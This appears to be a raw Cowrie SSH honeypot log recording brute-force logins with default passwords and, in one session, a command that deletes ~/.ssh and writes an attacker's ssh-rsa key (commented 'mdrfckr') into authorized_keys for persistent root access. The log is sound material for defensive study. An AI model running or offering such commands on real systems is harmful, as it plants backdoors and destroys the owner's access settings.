{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.314551Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.315433Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":42027,"dst_ip":"1.2.3.4","dst_port":22,"session":"5762a9458cac","protocol":"ssh","message":"New connection: 213.6.203.226:42027 (1.2.3.4:22) [session: 5762a9458cac]","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.381254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.381812Z","src_ip":"213.6.203.226","session":"5762a9458cac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.448433Z","src_ip":"213.6.203.226","session":"5762a9458cac"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.755750Z","src_ip":"213.6.203.226","session":"5762a9458cac"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:15.824140Z","src_ip":"213.6.203.226","session":"5762a9458cac"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":37352,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b67eba88447","protocol":"ssh","message":"New connection: 213.6.203.226:37352 (1.2.3.4:22) [session: 0b67eba88447]","sensor":"my-vps","timestamp":"2025-09-09T05:51:15.890699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:15.891405Z","src_ip":"213.6.203.226","session":"0b67eba88447"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:15.959097Z","src_ip":"213.6.203.226","session":"0b67eba88447"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.278772Z","src_ip":"213.6.203.226","session":"0b67eba88447"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.347019Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.348100Z","src_ip":"213.6.203.226","session":"0b67eba88447"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35628,"dst_ip":"1.2.3.4","dst_port":22,"session":"483072d4a847","protocol":"ssh","message":"New connection: 212.227.235.229:35628 (1.2.3.4:22) [session: 483072d4a847]","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.723371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.724022Z","src_ip":"212.227.235.229","session":"483072d4a847"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:16.805549Z","src_ip":"212.227.235.229","session":"483072d4a847"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T05:51:17.173125Z","src_ip":"212.227.235.229","session":"483072d4a847"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:18.256581Z","src_ip":"212.227.235.229","session":"483072d4a847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53822,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e4e7cd1e208","protocol":"ssh","message":"New connection: 212.227.235.229:53822 (1.2.3.4:22) [session: 3e4e7cd1e208]","sensor":"my-vps","timestamp":"2025-09-09T05:51:42.628305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:51:42.629327Z","src_ip":"212.227.235.229","session":"3e4e7cd1e208"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:51:42.871898Z","src_ip":"212.227.235.229","session":"3e4e7cd1e208"}
{"eventid":"cowrie.login.failed","username":"web","password":"123456789","message":"login attempt [web/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T05:51:43.885175Z","src_ip":"212.227.235.229","session":"3e4e7cd1e208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47330,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaff9a997787","protocol":"ssh","message":"New connection: 212.227.235.229:47330 (1.2.3.4:22) [session: aaff9a997787]","sensor":"my-vps","timestamp":"2025-09-09T05:51:44.850132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:44.850996Z","src_ip":"212.227.235.229","session":"aaff9a997787"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:45.068699Z","src_ip":"212.227.235.229","session":"aaff9a997787"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:45.130084Z","src_ip":"212.227.235.229","session":"3e4e7cd1e208"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T05:51:45.796968Z","src_ip":"212.227.235.229","session":"aaff9a997787"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:46.968218Z","src_ip":"212.227.235.229","session":"aaff9a997787"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54092,"dst_ip":"1.2.3.4","dst_port":22,"session":"69f60b3b6e32","protocol":"ssh","message":"New connection: 212.227.235.229:54092 (1.2.3.4:22) [session: 69f60b3b6e32]","sensor":"my-vps","timestamp":"2025-09-09T05:51:58.606464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:58.607229Z","src_ip":"212.227.235.229","session":"69f60b3b6e32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:58.692649Z","src_ip":"212.227.235.229","session":"69f60b3b6e32"}
{"eventid":"cowrie.login.failed","username":"operator","password":"123","message":"login attempt [operator/123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:51:59.076835Z","src_ip":"212.227.235.229","session":"69f60b3b6e32"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:00.164584Z","src_ip":"212.227.235.229","session":"69f60b3b6e32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35714,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f77f988cb91","protocol":"ssh","message":"New connection: 212.227.235.229:35714 (1.2.3.4:22) [session: 2f77f988cb91]","sensor":"my-vps","timestamp":"2025-09-09T05:52:10.961187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:52:10.969868Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:52:11.145680Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz#edc","message":"login attempt [root/!qaz#edc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:52:11.844621Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:52:12.218838Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:52:12.219543Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:52:12.220438Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:12.626571Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:52:12.867851Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:52:12.868657Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:52:13.055342Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:13.056190Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36318,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ef7e7dbe4e","protocol":"ssh","message":"New connection: 212.227.235.229:36318 (1.2.3.4:22) [session: 06ef7e7dbe4e]","sensor":"my-vps","timestamp":"2025-09-09T05:52:13.248731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:52:13.250568Z","src_ip":"212.227.235.229","session":"06ef7e7dbe4e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:52:13.440714Z","src_ip":"212.227.235.229","session":"06ef7e7dbe4e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:52:14.182748Z","src_ip":"212.227.235.229","session":"06ef7e7dbe4e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:15.372718Z","src_ip":"212.227.235.229","session":"06ef7e7dbe4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37070,"dst_ip":"1.2.3.4","dst_port":22,"session":"81dccf4cca3d","protocol":"ssh","message":"New connection: 212.227.235.229:37070 (1.2.3.4:22) [session: 81dccf4cca3d]","sensor":"my-vps","timestamp":"2025-09-09T05:52:15.548885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:52:15.549726Z","src_ip":"212.227.235.229","session":"81dccf4cca3d"}
